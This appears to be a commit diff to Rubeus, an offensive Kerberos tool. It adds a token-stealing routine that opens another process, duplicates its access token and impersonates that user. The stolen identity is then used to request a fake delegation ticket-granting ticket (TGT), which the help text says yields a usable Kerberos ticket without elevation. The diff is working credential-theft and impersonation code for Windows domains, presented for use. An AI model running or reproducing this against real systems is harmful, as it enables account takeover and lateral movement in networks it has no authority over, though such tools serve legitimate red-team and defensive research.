Add tgtdeleg token impersonation support

Rubeus/Commands/Tgtdeleg.cs

@@ -1,17 +1,58 @@
 using System;
 using System.Collections.Generic;
-
+using System.Security.Principal;
 
 namespace Rubeus.Commands
 {
     public class Tgtdeleg : ICommand
     {
         public static string CommandName => "tgtdeleg";
 
+        private static bool _StealTokenAndImpersonate(uint pid)
+        {
+            IntPtr hToken = IntPtr.Zero;
+            IntPtr hProcess = IntPtr.Zero;
+
+            hProcess = Interop.OpenProcess(0x0400, false, pid);
+
+            if (hProcess != IntPtr.Zero)
+            {
+                Interop.OpenProcessToken(hProcess, 983551, out hToken);
+
+                if (hToken != IntPtr.Zero)
+                {
+                    Interop.DuplicateTokenEx(hToken, 983551, IntPtr.Zero, 2, Interop.TOKEN_TYPE.TokenImpersonation, out IntPtr NewToken);
+
+                    if (NewToken != IntPtr.Zero)
+                    {
+                        Interop.ImpersonateLoggedOnUser(NewToken);
+                        Console.WriteLine("[+] Impersonating {0}", WindowsIdentity.GetCurrent().Name);
+                        return true;
+                    }
+                }
+            }
+
+            return false;
+        }
+
         public void Execute(Dictionary<string, string> arguments)
         {
             Console.WriteLine("\r\n[*] Action: Request Fake Delegation TGT (current user)\r\n");
-
+
+            if (arguments.ContainsKey("/pid"))
+            {
+                if (arguments.ContainsKey("/pid"))
+                {
+                    uint pid = Convert.ToUInt32(arguments["/pid"]);
+
+                    if (!_StealTokenAndImpersonate(pid))
+                    {
+                        Console.WriteLine("Impersonation Failed.");
+                        return;
+                    }
+                }
+            }
+
             if (arguments.ContainsKey("/target"))
             {
                 byte[] blah = LSA.RequestFakeDelegTicket(arguments["/target"]);
@@ -22,4 +63,4 @@ public void Execute(Dictionary<string, string> arguments)
             }
         }
     }
-}
+}

Rubeus/Domain/Info.cs

@@ -133,7 +133,7 @@ Parse and describe a ticket (service ticket or TGT):
         Rubeus.exe dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/nowrap]
 
     Retrieve a usable TGT .kirbi for the current user (w/ session key) without elevation by abusing the Kerberos GSS-API, faking delegation:
-        Rubeus.exe tgtdeleg [/target:SPN]
+        Rubeus.exe tgtdeleg [/pid:PROCESSID_TOKEN_TO_IMPERSONATE] [/target:SPN]
 
     Monitor every /interval SECONDS (default 60) for new TGTs:
         Rubeus.exe monitor [/interval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS]

Rubeus/lib/Interop.cs

@@ -1477,7 +1477,12 @@ public class NetResource
             public string Provider;
         }
 
-
+        [Flags]
+        public enum TOKEN_TYPE
+        {
+            TokenPrimary = 1,
+            TokenImpersonation
+        }
 
 
 
@@ -1591,6 +1596,18 @@ public static extern bool DuplicateToken(
             int SECURITY_IMPERSONATION_LEVEL,
             ref IntPtr DuplicateTokenHandle);
 
+        [DllImport("Kernel32.dll")]
+        public static extern IntPtr OpenProcess(
+            uint dwDesiredAccess,
+            bool bInheritHandle, 
+            uint dwProcessId);
+
+        [DllImport("advapi32.dll")]
+        public static extern bool DuplicateTokenEx(
+            IntPtr hExistingToken,
+            uint dwDesiredAccess,
+            IntPtr lpTokenAttributes, int level, TOKEN_TYPE type, out IntPtr phNewToken);
+
         [DllImport("advapi32.dll", SetLastError = true)]
         public static extern bool ImpersonateLoggedOnUser(
             IntPtr hToken);
@@ -1705,4 +1722,4 @@ public static extern int WNetAddConnection2(NetResource netResource,
         public static extern int WNetCancelConnection2(string name, int flags,
             bool force);
     }
-}
+}